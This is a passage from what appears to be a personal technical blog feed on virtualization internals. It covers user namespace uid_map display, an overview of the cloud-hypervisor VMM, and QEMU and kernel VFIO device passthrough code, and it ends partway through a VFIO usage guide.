int ret = -EINVAL;
task = get_proc_task(inode);
if (task) {
rcu_read_lock();
ns = get_user_ns(task_cred_xxx(task, user_ns));
rcu_read_unlock();
put_task_struct(task);
}
if (!ns)
goto err;
ret = seq_open(file, seq_ops);
if (ret)
goto err_put_ns;
seq = file->private_data;
seq->private = ns;
return 0;
err_put_ns:
put_user_ns(ns);
err:
return ret;
}
</code></pre></div></div>
<p>Here we should notice, the ‘seq->private’ stores the /proc/PID/uid_map’s process’s user namespace. And also ‘seq_open’ sets the ‘seq_file->file’ to the file’s struct file.</p>
<p>Following is the show process of the /proc/PID/uid_map.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int uid_m_show(struct seq_file *seq, void *v)
{
struct user_namespace *ns = seq->private;
struct uid_gid_extent *extent = v;
struct user_namespace *lower_ns;
uid_t lower;
lower_ns = seq_user_ns(seq);
if ((lower_ns == ns) && lower_ns->parent)
lower_ns = lower_ns->parent;
lower = from_kuid(lower_ns, KUIDT_INIT(extent->lower_first));
seq_printf(seq, "%10u %10u %10u\n",
extent->first,
lower,
extent->count);
return 0;
}
static inline struct user_namespace *seq_user_ns(struct seq_file *seq)
{
#ifdef CONFIG_USER_NS
return seq->file->f_cred->user_ns;
#else
extern struct user_namespace init_user_ns;
return &init_user_ns;
#endif
}
</code></pre></div></div>
<p>The ‘ns’ is the process’s user namespace, and the ‘lower_ns’ is the open process’s user namespace. So here we can see different open process may have different value of /proc/PID/uid_map. We have talked about ‘from_kuid’ above, it returns the ‘kuid’s mapping in the ‘targ’ user_namespace.</p>
<p>So let’s say our example. us1 has ‘0 1000 1’ uid_map, us2 has ‘200 1000 1’ uid_map.</p>
<p>So When the process in us1 read the process in us2’s /proc/US2/uid_map. The ‘lower_ns’ in ‘uid_m_show’ will be the us1 process, the ‘extent’ will be the us2 process. So it will show
‘200 0 1’. Conversely, when the process in us2 read the /proc/US1/uid_map. It will show ‘0 200 1’.</p>
<p>Following pics show the case.</p>
<p><img src="/assets/img/userns/3.png" alt="" /></p>
<p><img src="/assets/img/userns/4.png" alt="" /></p>
A brief overview of cloud-hypervisor, a modern VMM2019-09-07T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/09/07/cloud-hypervisor
<h3> Background </h3>
<p>Several months ago, intel made the cloud-hypervisor open sourced. The cloud-hypervisor’s development is driven by the idea that in modern world we need a more light, more security, and more efficiency VMM. The traditional solution of cloud virtual machine is qemu and kvm. In cloud, we just need an environment to run workloads, there is no need to pay for the legacy devices which qemu emulates. Also qemu is written using C which is considered harmful. Rust is a security language which is a good choice to build next-generation VMM. Google implements the first Rust-based light VMM called crosvm which is in Fuchsia operating system. Then aws develops his own light VMM called firecracked which is based of crosvm. After the birth of crosvm and firecracker, some companies realize that there are lots of reduplication in crosvm and firecracker, also if someone wants to write a Rust-based VMM, it need do these reduplication again. To get avoid this, these companies setup a rust-vmm project. rust-vmm abstracts the common virtualization components which implements a Rust-based VMM required to be crate. These components contains kvm wrapper, virtio devices and some utils, etc. People who wants to implement a Rust-based VMM can util these components. This makes write a Rust-based VMM very easy.</p>
<p>Cloud-hypervisor is developed under this background by intel. It uses some code of rust-vmm(vm-memory, kvm_ioctls), firecracker and crosvm. The <a href="https://github.com/intel/cloud-hypervisor">cloud-hypervisor’s page</a> contains the detailed usage info.</p>
<h3> Architecture </h3>
<p>As we know, qemu emulates a whole machine system. Below is a diagram of the i440fx architecture(from qemu sites).</p>
<p><img src="/assets/img/cloud_hypervisor/1.png" alt="" /></p>
<p>As we can see the topology of qemu emulates is nearly same as the physical machine. We need a i440fx motherboard, the pci host bridge, the pci bus bus tree, the superio controller and isa bus tree.</p>
<p>However we don’t need this compilcated emulation. The most that we need for cloud workloads is computing, networking, storage. So cloud-hypervisor has following architecture.</p>
<p><img src="/assets/img/cloud_hypervisor/2.png" alt="" /></p>
<p>As we can see, the cloud-hypervisor’s architecutre is very easy, it even has no abstract of motherboard. It has just several virtio devices, no isa bus, no PCI bus tree. Following shows the pci devices.</p>
<p><img src="/assets/img/cloud_hypervisor/4.png" alt="" /></p>
<h3> Some code </h3>
<p>Following diagram shows the basic function callchains.</p>
<p><img src="/assets/img/cloud_hypervisor/3.png" alt="" /></p>
<p>Some of the notes:</p>
<p>cloud-hypervisor utils several rust-vmm components, such as vm-memory(for memory region), vm-allocator(for memory space and irq allocation), kvm-bindings(for kvm ioctl), linux-loader(for loading kernel elf file) and so on.</p>
<p>Like firecracker, cloud-hypervisor loads the kernel to VM’s space and set the vcpu’s PC to startup_64(entrypoint of vmlinux). Also cloud-hypervisor implements a firmware loader.</p>
<p>The memory region and irq resource is managed by a BTree.</p>
<p>Implement a legacy device (i8042) to shutdown the VM.</p>
<p>There are also some other interesting things in cloud-hypervisor/rust-vmm/firecracker/crosvm.</p>
<p>Anyway, the cloud-hypervisor has a clear architecture, it reduces the complexity of devices/buses which qemu has to emulate.</p>
qemu VM device passthrough using VFIO, the code analysis2019-08-31T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/31/vfio-passthrough
<p>QEMU uses VFIO to assign physical devices to VMs. When using vfio, the qemu command line should add following option:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> -device vfio-pci,host=00:12.0,id=net0
</code></pre></div></div>
<p>This adds a vfio-pci device sets the physical device’s path to ‘host’. As we have said in the <a href="https://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/21/vfio-driver-analysis">VFIO driver analysis</a> post VFIO decomposes the physical device as a set of userspace API and recomposes the physical device’s resource. So the most work of the vfio-pci device’s realization ‘vfio_realize’ is to decompose the physical device and setup the relation of the physical device’s resource with the virtual machine.</p>
<h3> Bind the device to a domain </h3>
<p>The physical device which will be assigned to VM has been bind to vfio-pci, the group in ‘/dev/vfio/’ has been created. So ‘vfio_realize’ first check the device and get the device’s groupid. Then it call ‘vfio_get_group’. Following is the call chain of this function.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> vfio_get_group
->qemu_open("/dev/vfio/$groupid")
->vfio_connect_container
->qemu_open("/dev/vfio/vfio")
->vfio_init_container
->ioctl(VFIO_GROUP_SET_CONTAINER)
->ioctl(VFIO_SET_IOMMU)
->vfio_kvm_device_add_group
->memory_listener_register
</code></pre></div></div>
<p>‘vfio_get_group’ first open the group file in ‘/dev/vfio/$groupid’. ‘vfio_connect_container’ opens a new container and calls ‘vfio_init_container’ to add this vfio group to the container. After ‘vfio_init_container’, the device has been related with a conatiner. And the root iommu’s root table has been setup.</p>
<p>‘vfio_kvm_device_add_group’ bridges the ‘kvm’ subsystem and ‘iommu’ subsystem. In the final ‘vfio_connect_container’ it registers a ‘vfio_memory_listener’ to listen the memory layout change event. In the ‘region_add’ callback it calls ‘vfio_dma_map’ to setup the gpa(iova)->hpa. When the guest uses the gpa in DMA programming, the iommu can translate this gpa to hpa and access the physical memory directly.</p>
<h3> Populate the device's resource </h3>
<p>After setting the device’s DMA remapping, ‘vfio_realize’ will get the device’s resource and use these resources to reconstruct the vfio-pci device.</p>
<p>First ‘vfio_get_device’ get the vfio device’s fd by calling ‘ioctl(VFIO_GROUP_GET_DEVICE_FD)’ with the assigned device’ name. Then ‘vfio_get_device’ calls ‘ioctl(VFIO_DEVICE_GET_INFO)’ on the device fd and get the basic info of the device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_device_info {
__u32 argsz;
__u32 flags;
#define VFIO_DEVICE_FLAGS_RESET (1 << 0) /* Device supports reset */
#define VFIO_DEVICE_FLAGS_PCI (1 << 1) /* vfio-pci device */
#define VFIO_DEVICE_FLAGS_PLATFORM (1 << 2) /* vfio-platform device */
#define VFIO_DEVICE_FLAGS_AMBA (1 << 3) /* vfio-amba device */
#define VFIO_DEVICE_FLAGS_CCW (1 << 4) /* vfio-ccw device */
#define VFIO_DEVICE_FLAGS_AP (1 << 5) /* vfio-ap device */
__u32 num_regions; /* Max region index + 1 */
__u32 num_irqs; /* Max IRQ index + 1 */
};
</code></pre></div></div>
<p>Return to ‘vfio_realize’, after ‘vfio_get_device’ it calls ‘vfio_populate_device’ to populate the device’s resource. ‘vfio_populate_device’ get the 6 BAR region info and 1 PCI config region info and 1 vga region info(If has). ‘vfio_region_setup’ is called to populated the BAR region. Every region is strored in a ‘VFIORegion’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> typedef struct VFIORegion {
struct VFIODevice *vbasedev;
off_t fd_offset; /* offset of region within device fd */
MemoryRegion *mem; /* slow, read/write access */
size_t size;
uint32_t flags; /* VFIO region flags (rd/wr/mmap) */
uint32_t nr_mmaps;
VFIOMmap *mmaps;
uint8_t nr; /* cache the region number for debug */
} VFIORegion;
</code></pre></div></div>
<p>When we unbind the physical device from its driver, and rebind it with vfio-pci driver, the resource of device is released. Here the ‘fd_offset’ represent the offset within the device fd doing mmap. ‘mem’ is used for qemu to represent on IO region.</p>
<p>Calling ioctl(VFIO_DEVICE_GET_REGION_INFO) on the device fd we can get the region info, the most important is regions’s size, flags, fd_offset, and index.</p>
<p>After getting the io region info, ‘vfio_populate_device’ gets the PCI configuration region.</p>
<p>Later in the ‘vfio_realize’ it calls ‘vfio_bars_prepare’ and ‘vfio_bars_register’ to mmap the device’s io region to usespace. ‘vfio_bars_prepare’ calls ‘vfio_bar_prepare’ for every io region.
‘vfio_bar_prepare’ get the info of the io region such as “the IO region is ioport or mmio”, “the mem type of thsi IO region’. ‘vfio_bars_register’ calls ‘vfio_bar_register’ on every io region. ‘vfio_bar_register’ initialize a MemoryRegion and calls ‘vfio_region_mmap’ to mmap the device io region to userspace. Finally ‘vfio_bar_register’ calls ‘pci_register_bar’ to register BAR for vfio-pci device. Here we can see the parameter of ‘pci_register_bar’ is from the physical device.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static void vfio_bar_register(VFIOPCIDevice *vdev, int nr)
{
VFIOBAR *bar = &vdev->bars[nr];
char *name;
if (!bar->size) {
return;
}
bar->mr = g_new0(MemoryRegion, 1);
name = g_strdup_printf("%s base BAR %d", vdev->vbasedev.name, nr);
memory_region_init_io(bar->mr, OBJECT(vdev), NULL, NULL, name, bar->size);
g_free(name);
if (bar->region.size) {
memory_region_add_subregion(bar->mr, 0, bar->region.mem);
if (vfio_region_mmap(&bar->region)) {
error_report("Failed to mmap %s BAR %d. Performance may be slow",
vdev->vbasedev.name, nr);
}
}
pci_register_bar(&vdev->pdev, nr, bar->type, bar->mr);
}
</code></pre></div></div>
<p>Following figure shows the data structure of VFIORegion.</p>
<p><img src="/assets/img/vfio3/1.png" alt="" /></p>
<p>Here we can see, the vfio-pci IO region actually has the backend qemu’s virtual memory. It is the IO region of the physical device mapped into the userspace. In normal qemu virtual device case, the IO region is not backed with a region of virtual memory, so when the guest access these IO region, it traps into the qemu by EPT misconfiguration. For vfio-pci virtual device, its IO region has a backend virtual memory, so when the qemu setup the EPT map, this will also setup these IO region. When the guest access the vfio-pci device’s IO region. It just accesses the physical device IO region. Remember the userspace IO region of vfio-pci device is mammped from the physical device.</p>
<h3> Config the device </h3>
<p>In ‘vfio_populate_device’ it will get the PCI configuration region’s size and offset within the vfio device fd. In ‘vfio_realize’ after ‘vfio_populate_device’ it calls ‘pread’ to read the device’s PCI config region and store it in ‘vdev->pdev.config’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ret = pread(vdev->vbasedev.fd, vdev->pdev.config,
MIN(pci_config_size(&vdev->pdev), vdev->config_size),
vdev->config_offset);
</code></pre></div></div>
<p>‘vfio_realize’ then allocates a ‘emulated_config_bits’space. This space contains the bits to indicate which ‘PCI config region’ is used when the guest access the vfio pci device’s pci config region. If the byte(bits) in the ‘emulated_config_bits’ is set, ‘vdev->pdev.config’ is used, if it is not set, the qemu will access the physical device’s PCI config region.</p>
<p>‘vfio_realize’ configures the vfio pci device according the physical device, for example reading the ‘PCI_VENDOR_ID’ to assign to ‘vdev->vendor_id’, and the ‘PCI_DEVICE_ID’ to assign to ‘vdev->device_id’. ‘vfio_pci_size_rom’, ‘vfio_msix_early_setup’, ‘vfio_add_capabilities’ just operates the PCI configuration region.</p>
<p>Then ‘vfio_realize’ setup the device’s interrupt process.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> if (vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1)) {
vdev->intx.mmap_timer = timer_new_ms(QEMU_CLOCK_VIRTUAL,
vfio_intx_mmap_enable, vdev);
pci_device_set_intx_routing_notifier(&vdev->pdev, vfio_intx_update);
ret = vfio_intx_enable(vdev, errp);
if (ret) {
goto out_teardown;
}
}
</code></pre></div></div>
<p>Here ‘pci_device_set_intx_routing_notifier’ is called to register a ‘intx_routing_notifier’. We need this because the host bridge of the guest may change the assigned device’s INTx to irq mapping.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_intx_enable(VFIOPCIDevice *vdev, Error **errp)
{
uint8_t pin = vfio_pci_read_config(&vdev->pdev, PCI_INTERRUPT_PIN, 1);
Error *err = NULL;
int32_t fd;
int ret;
if (!pin) {
return 0;
}
vfio_disable_interrupts(vdev);
vdev->intx.pin = pin - 1; /* Pin A (1) -> irq[0] */
pci_config_set_interrupt_pin(vdev->pdev.config, pin);
#ifdef CONFIG_KVM
/*
* Only conditional to avoid generating error messages on platforms
* where we won't actually use the result anyway.
*/
if (kvm_irqfds_enabled() && kvm_resamplefds_enabled()) {
vdev->intx.route = pci_device_route_intx_to_irq(&vdev->pdev,
vdev->intx.pin);
}
#endif
ret = event_notifier_init(&vdev->intx.interrupt, 0);
if (ret) {
error_setg_errno(errp, -ret, "event_notifier_init failed");
return ret;
}
fd = event_notifier_get_fd(&vdev->intx.interrupt);
qemu_set_fd_handler(fd, vfio_intx_interrupt, NULL, vdev);
if (vfio_set_irq_signaling(&vdev->vbasedev, VFIO_PCI_INTX_IRQ_INDEX, 0,
VFIO_IRQ_SET_ACTION_TRIGGER, fd, &err)) {
error_propagate(errp, err);
qemu_set_fd_handler(fd, NULL, NULL, vdev);
event_notifier_cleanup(&vdev->intx.interrupt);
return -errno;
}
vfio_intx_enable_kvm(vdev, &err);
if (err) {
warn_reportf_err(err, VFIO_MSG_PREFIX, vdev->vbasedev.name);
}
vdev->interrupt = VFIO_INT_INTx;
trace_vfio_intx_enable(vdev->vbasedev.name);
return 0;
}
</code></pre></div></div>
<p>‘vfio_intx_enable’ set the vfio pci device’s interrupt. This function initialize an EventNotifier ‘vdev->intx.interrupt’. The ‘read’ of this event notifier is ‘vfio_intx_interrupt’. Then ‘vfio_intx_enable’ calls ‘vfio_set_irq_signaling’ to set the fd as the interrupt eventfd. When host device receives interrupt, it will signal in this eventfd. The handler of this fd which is ‘vfio_intx_interrupt’ will handle this interrupt. This is the common case, but it is not efficient. So ‘vfio_intx_enable_kvm’ is called.</p>
<p>kvm has a mechanism called irqfd. qemu can call ioctl(KVM_IRQFD) with ‘kvm_irqfd’ parameter to connect a irq and a fd.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct kvm_irqfd irqfd = {
.fd = event_notifier_get_fd(&vdev->intx.interrupt),
.gsi = vdev->intx.route.irq,
.flags = KVM_IRQFD_FLAG_RESAMPLE,
};
</code></pre></div></div>
<p>When the ‘fd’ has was signaled, the kvm subsystem will inject a ‘gsi’ interrupt to the VM. The irqfd bypass the userspace qemu and inject interrupt in kernel directly.</p>
<p>‘vfio_intx_enable_kvm’ is used to setup the interrupt fd’s irqfd. Notice here is a resample fd. In the vfio device interrupt handler in kernel, it will disable the interrupt. When the guest completes the interrupt dispatch, it will trigger an EOI and then the vfio can signal an event in the resample fd and reenable the interrupt again.</p>
<p>After doing some of the quirk work, ‘vfio_realize’ calls ‘vfio_register_err_notifier’ and ‘vfio_register_req_notifier’ to register two EventNotifier. Error EventNotifier is signaled when the physical has unrecoveralbe error detected. And req EventNotifier is signaled to unplug the vfio pci device.</p>
VFIO driver analysis2019-08-21T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/21/vfio-driver-analysis
<p>The VFIO driver is a framework for exposing direct device access to userspace.
Virtual machine technology uses VFIO to assign physical device to VMs for highest possible IO performance. In this post, I will just focus the driver of VFIO.</p>
<p>VFIO’s basic idea is showing in the following figure. This is from Alex’s talk <a href="http://www.linux-kvm.org/images/5/54/01x04-Alex_Williamson-An_Introduction_to_PCI_Device_Assignment_with_VFIO.pdf">An Introduction to PCI Device Assignment with VFIO</a>.</p>
<p><img src="/assets/img/vfio2/1.png" alt="" /></p>
<p>VFIO decomposes the physical device as a set of userspace API and recomposes the physical device’s resource to a virtual device in qemu.</p>
<p>There are three concepts in VFIO: Groups, Devices, and Containers.</p>
<p>Devices create a programming interface made up of IO access, interrupts, and DMA. The userspace(qemu) can utilize this interface to get the device’s information and config the devices.</p>
<p>Groups is a set of devices which is isolatable from all other devices in the system. Group is the minimum granularity that can be assigned to a VM.</p>
<p>Containers is a set of groups. Different groups can be set in the same container.</p>
<p>Following figure shows the relation of container, group and device.</p>
<p><img src="/assets/img/vfio2/2.png" alt="" /></p>
<p>Following figure shows the architecture of VFIO PCI.</p>
<p><img src="/assets/img/vfio2/3.png" alt="" /></p>
<h3> Bind device to vifo-pci driver </h3>
<p>In the ‘<a href="https://terenceli.github.io/技术/2019/08/16/vfio-usage">VFIO usage</a>’ post, we know that before assigning the device to VM, we need to unbind its original driver and bind it to vfio-pci driver firstly.</p>
<p>vfio-pci driver just registers ‘vfio_pci_driver’ in ‘vfio_pci_init’ function.
When binding the assigned device, the ‘probe’ callback will be called, it’s ‘vfio_pci_probe’.</p>
<p>‘vfio_pci_probe’ first allocates and initializes a ‘vfio_pci_device’ struct, then calls ‘vfio_add_group_dev’ to create and add a ‘vfio_device’ to ‘vfio_group’. If the ‘vfio_group’ is not created, ‘vfio_add_group_dev’ will also create one.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> int vfio_add_group_dev(struct device *dev,
const struct vfio_device_ops *ops, void *device_data)
{
struct iommu_group *iommu_group;
struct vfio_group *group;
struct vfio_device *device;
iommu_group = iommu_group_get(dev);
if (!iommu_group)
return -EINVAL;
group = vfio_group_get_from_iommu(iommu_group);
if (!group) {
group = vfio_create_group(iommu_group);
if (IS_ERR(group)) {
iommu_group_put(iommu_group);
return PTR_ERR(group);
}
} else {
/*
* A found vfio_group already holds a reference to the
* iommu_group. A created vfio_group keeps the reference.
*/
iommu_group_put(iommu_group);
}
device = vfio_group_get_device(group, dev);
if (device) {
WARN(1, "Device %s already exists on group %d\n",
dev_name(dev), iommu_group_id(iommu_group));
vfio_device_put(device);
vfio_group_put(group);
return -EBUSY;
}
device = vfio_group_create_device(group, dev, ops, device_data);
if (IS_ERR(device)) {
vfio_group_put(group);
return PTR_ERR(device);
}
/*
* Drop all but the vfio_device reference. The vfio_device holds
* a reference to the vfio_group, which holds a reference to the
* iommu_group.
*/
vfio_group_put(group);
return 0;
}
</code></pre></div></div>
<p>‘vfio_group’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_group {
struct kref kref;
int minor;
atomic_t container_users;
struct iommu_group *iommu_group;
struct vfio_container *container;
struct list_head device_list;
struct mutex device_lock;
struct device *dev;
struct notifier_block nb;
struct list_head vfio_next;
struct list_head container_next;
struct list_head unbound_list;
struct mutex unbound_lock;
atomic_t opened;
};
</code></pre></div></div>
<p>‘vfio_create_group’ creates and initializes a ‘vfio_group’. ‘vfio_create_group’ also create a device file in ‘/dev/vfio/’ directory, it represents the group file, this file’s file_ops is ‘vfio_group_fops’. ‘vfio_group’s dev is for this device. ‘container’ field points the container of which this group attached to. ‘device_list’ links the vfio device’. ‘iommu_group’ points the low level of iommu group, this is the ‘device’s iommu group created when the IOMMU setup. ‘vfio_group’ is like a bridge between the vfio interface and the low level iommu. Once ‘vfio_group’ is created, it will be linked in the global variable ‘vfio’s group_list.</p>
<p>In ‘vfio_add_group_dev’, after get or create a ‘vfio_group’, it will create and add a ‘vfio_device’ to the ‘vfio_group’. This is done by ‘vfio_group_create_device’. ‘vfio_device’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_device {
struct kref kref;
struct device *dev;
const struct vfio_device_ops *ops;
struct vfio_group *group;
struct list_head group_next;
void *device_data;
};
</code></pre></div></div>
<p>Here ‘dev’ is the physical device. ‘ops’ is ‘vfio_pci_ops’, ‘group’ is get or created right now, ‘group_next’ is used to link this ‘vfio_device’ to ‘vfio_group’s “device_list’ field. ‘device_data’ will be set to ‘vfio_pci_device’ created in ‘vfio_pci_probe’.</p>
<p>When the userspace trigger ioctl(VFIO_GROUP_GET_DEVICE_FD) in group’s fd, the corresponding handler ‘vfio_group_get_device_fd’ will alloc a ‘file’ pointer and a ‘fd’ using the ‘vfio_device’ as the private data. This fd’s file_ops is ‘vfio_device_fops’ which callbacks calls the ‘vfio_pci_ops’s corresponding function in mostly cases.</p>
<p>Following figure shows some of the data structure’s relation.</p>
<p><img src="/assets/img/vfio2/4.png" alt="" /></p>
<h3> VFIO kernel module initialization </h3>
<p>VFIO driver creates the ‘/dev/vfio/vfio’ device and manages the whole system’s VFIO. VFIO driver defines a ‘vfio’ global variable to store the vfio iommu driver and iommu group.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static struct vfio {
struct class *class;
struct list_head iommu_drivers_list;
struct mutex iommu_drivers_lock;
struct list_head group_list;
struct idr group_idr;
struct mutex group_lock;
struct cdev group_cdev;
dev_t group_devt;
wait_queue_head_t release_q;
} vfio;
</code></pre></div></div>
<p>All vfio iommu drivers will be linked in ‘iommu_drivers_list’. All vfio group will be linke in ‘group_list’.</p>
<p>In ‘vfio_init’, it initialize this ‘vfio’ struct and register a misc device named ‘vfio_dev’. It creates a ‘vfio’ device class and allocates the device numbers for the group node in ‘/dev/vfio/$group_id’.</p>
<p>‘/dev/vfio/vfio’s file_ops is ‘vfio_fops’, the ‘open’ callback is ‘vfio_fops_open’. We can see a ‘vfio_container’ is set to the ‘/dev/vfio/vfio/’s fd ‘private_data’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_fops_open(struct inode *inode, struct file *filep)
{
struct vfio_container *container;
container = kzalloc(sizeof(*container), GFP_KERNEL);
if (!container)
return -ENOMEM;
INIT_LIST_HEAD(&container->group_list);
init_rwsem(&container->group_lock);
kref_init(&container->kref);
filep->private_data = container;
return 0;
}
</code></pre></div></div>
<h3> Attach the group to container and Allocate IOMMU </h3>
<p>We now has a container fd(by opening the ‘/dev/vfio/vfio’ device) and group fd(by opening the ‘/dev/vfio/$gid’). We need to attach this group to container, this is done by calling ioctl(VFIO_GROUP_SET_CONTAINER) in group fd. The handle for this ioctl is ‘vfio_group_set_container’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static int vfio_group_set_container(struct vfio_group *group, int container_fd)
{
struct fd f;
struct vfio_container *container;
struct vfio_iommu_driver *driver;
int ret = 0;
...
f = fdget(container_fd);
...
container = f.file->private_data;
WARN_ON(!container); /* fget ensures we don't race vfio_release */
down_write(&container->group_lock);
driver = container->iommu_driver;
if (driver) {
ret = driver->ops->attach_group(container->iommu_data,
group->iommu_group);
if (ret)
goto unlock_out;
}
group->container = container;
list_add(&group->container_next, &container->group_list);
/* Get a reference on the container and mark a user within the group */
vfio_container_get(container);
atomic_inc(&group->container_users);
unlock_out:
up_write(&container->group_lock);
fdput(f);
return ret;
}
</code></pre></div></div>
<p>The most important work here is to add the group to the container’s ‘group_list’. Also if the container has been set to a iommu driver, ‘vfio_group_set_container’ will attach this group to the iommu driver.</p>
<p>The userspace can set the container’s iommu by calling ioctl(VFIO_SET_IOMMU) on container fd. The handler for this ioctl is ‘vfio_ioctl_set_iommu’.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static long vfio_ioctl_set_iommu(struct vfio_container *container,
unsigned long arg)
{
struct vfio_iommu_driver *driver;
long ret = -ENODEV;
down_write(&container->group_lock);
/*
* The container is designed to be an unprivileged interface while
* the group can be assigned to specific users. Therefore, only by
* adding a group to a container does the user get the privilege of
* enabling the iommu, which may allocate finite resources. There
* is no unset_iommu, but by removing all the groups from a container,
* the container is deprivileged and returns to an unset state.
*/
if (list_empty(&container->group_list) || container->iommu_driver) {
up_write(&container->group_lock);
return -EINVAL;
}
mutex_lock(&vfio.iommu_drivers_lock);
list_for_each_entry(driver, &vfio.iommu_drivers_list, vfio_next) {
void *data;
if (!try_module_get(driver->ops->owner))
continue;
/*
* The arg magic for SET_IOMMU is the same as CHECK_EXTENSION,
* so test which iommu driver reported support for this
* extension and call open on them. We also pass them the
* magic, allowing a single driver to support multiple
* interfaces if they'd like.
*/
if (driver->ops->ioctl(NULL, VFIO_CHECK_EXTENSION, arg) <= 0) {
module_put(driver->ops->owner);
continue;
}
/* module reference holds the driver we're working on */
mutex_unlock(&vfio.iommu_drivers_lock);
data = driver->ops->open(arg);
if (IS_ERR(data)) {
ret = PTR_ERR(data);
module_put(driver->ops->owner);
goto skip_drivers_unlock;
}
ret = __vfio_container_attach_groups(container, driver, data);
if (!ret) {
container->iommu_driver = driver;
container->iommu_data = data;
} else {
driver->ops->release(data);
module_put(driver->ops->owner);
}
goto skip_drivers_unlock;
}
mutex_unlock(&vfio.iommu_drivers_lock);
skip_drivers_unlock:
up_write(&container->group_lock);
return ret;
}
</code></pre></div></div>
<p>The vfio iommu driver supported by system is registered in ‘vfio.iommu_drivers_list’. vfio iommu driver is the layer between vfio and iommu hardware. We will take the version 2 of type1 vfio iommu as an example. ‘vfio_ioctl_set_iommu’ first calls the ‘open’ callback of vfio iommu driver, and get a driver-specific data. Then use this driver-specific data call ‘__vfio_container_attach_groups’, this function iterate the groups in this container and calls the ‘attach_group’ callback of vfio iommu driver.</p>
<p>‘vfio_iommu_driver_ops_type1’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> static const struct vfio_iommu_driver_ops vfio_iommu_driver_ops_type1 = {
.name = "vfio-iommu-type1",
.owner = THIS_MODULE,
.open = vfio_iommu_type1_open,
.release = vfio_iommu_type1_release,
.ioctl = vfio_iommu_type1_ioctl,
.attach_group = vfio_iommu_type1_attach_group,
.detach_group = vfio_iommu_type1_detach_group,
};
</code></pre></div></div>
<p>‘vfio_iommu_type1_open’ allocates and initializes a ‘vfio_iommu’ strut and return it. ‘vfio_iommu’ is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_iommu {
struct list_head domain_list;
struct mutex lock;
struct rb_root dma_list;
bool v2;
bool nesting;
};
</code></pre></div></div>
<p>‘domain_list’ links the ‘vfio_domain’ attached to the container. ‘dma_list’ is used to record the IOVA information.</p>
<p>‘vfio_iommu_type1_attach_group’ is used to attach a iommu_group to the vfio iommu. ‘vfio_iommu_type1_attach_group’ will allocate a new ‘vfio_group’ and ‘vfio_domain’. ‘vfio_domain’ has a ‘iommu_domain’ which is used to store the hardware iommu information. Then this function calls ‘iommu_attach_group’ to attach the iommu group to iommu domain. This finally calls ‘intel_iommu_attach_device’. After ‘domain_add_dev_info’->’dmar_insert_one_dev_info’->’domain_context_mapping’…->’domain_context_mapping_one’. The device’s info was written to the context table.
Notice, in ‘vfio_iommu_type1_attach_group’, if two vfio_domain has the same iommu, then different group will be attached to the same ‘vfio_domain’.</p>
<p>Following figure shows some of the data structure’s relation.</p>
<p><img src="/assets/img/vfio2/5.png" alt="" /></p>
<h3> IOVA map </h3>
<p>The userspace can set the iova(GPA)->HPA mapping by calling ioctl(VFIO_IOMMU_MAP_DMA) on container fd.
The ‘VFIO_IOMMU_MAP_DMA’s argument is ‘vfio_iommu_type1_dma_map’. It is defined as following:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> struct vfio_iommu_type1_dma_map {
__u32 argsz;
__u32 flags;
#define VFIO_DMA_MAP_FLAG_READ (1 << 0) /* readable from device */
#define VFIO_DMA_MAP_FLAG_WRITE (1 << 1) /* writable from device */
__u64 vaddr; /* Process virtual address */
__u64 iova; /* IO virtual address */
__u64 size; /* Size of mapping (bytes) */
};
</code></pre></div></div>
<p>The ‘vaddr’ is the virtual adress of qemu process, the iova is the iova of device’s view. This ioctl handler is ‘vfio_dma_do_map’. ‘vfio_dma_do_map’ will pin the physical pages of virtual address of qemu’s and then calls ‘vfio_iommu_map’ to do the iova to hpa’s mapping. It calls ‘iommu_map’ and finally calls the ‘iommu_ops’s map function, this is ‘intel_iommu_map’ to complete the mapping work.</p>
VFIO usage2019-08-16T00:00:00+00:00http://terenceli.github.io/%E6%8A%80%E6%9C%AF/2019/08/16/vfio-usage
<p>VFIO is used to assign a physical IO device to the virtual machine. I will write some internal posts to explain how VFIO works. First of all, we need to know how to use VFIO. We will create a VMware workstation virtual machine(VM1), in the VMs, we will create a qemu virtual machine(VM2) and assign a device of VM1’s to VM2.</p>
<h3> 1 </h3>
<p>Create a new network device for VM1 in VMware workstation, open the .vmx file with editor and change this new network’s type from e1000 to vmxnet3.</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> ethernet1.virtualDev = "vmxnet3"
</code></pre></div></div>
<h3> 2 </h3>
<p>Find the PCI address(BDF) in system(lspci -v)</p>
